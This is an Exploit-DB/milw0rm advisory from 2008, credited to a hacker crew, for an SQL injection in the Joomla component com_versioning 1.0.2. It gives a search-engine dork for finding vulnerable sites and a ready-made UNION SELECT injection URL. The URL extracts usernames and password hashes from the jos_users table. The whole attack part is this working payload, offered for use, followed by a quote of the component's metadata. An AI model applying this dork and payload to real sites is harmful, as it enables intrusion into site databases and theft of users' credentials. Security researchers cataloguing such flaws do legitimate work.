Joomla! Component versioning 1.0.2 - 'id' SQL Injection

EDB-ID:

5989




Platform:

PHP

Date:

2008-07-01


[+] Name    : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

[+] Team           : DarkMatter Crew

[+] Crew website       : WwW.SykoPainKilla.CoM

[+] Author         : SpK & His0k4

[+] Contact        : fatal.1.ty[at]hotmail.com[dot]com

[+] D0rk      : inurl:index.php?option=com_versioning



[+] Expl0iT :

http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--


#
#
#
#
############################################
                                           #
Visit our website www.sykopainkilla.com    #
                                           #
                                           #
#DarmMatter & SpK F0R3V3R                  #
                                           #
############################################
#
#
#
#


side note:
<name>versioning</name>
<creationDate>11.14.2006</creationDate>
<author>Thomas Papin</author>
<copyright>
This component is released under the GNU/GPL License.
</copyright>
<authorEmail>thomas.papin@free.fr</authorEmail>
<authorUrl>www.joomprod.com</authorUrl>
<version>1.0.2</version>

# milw0rm.com [2008-07-01]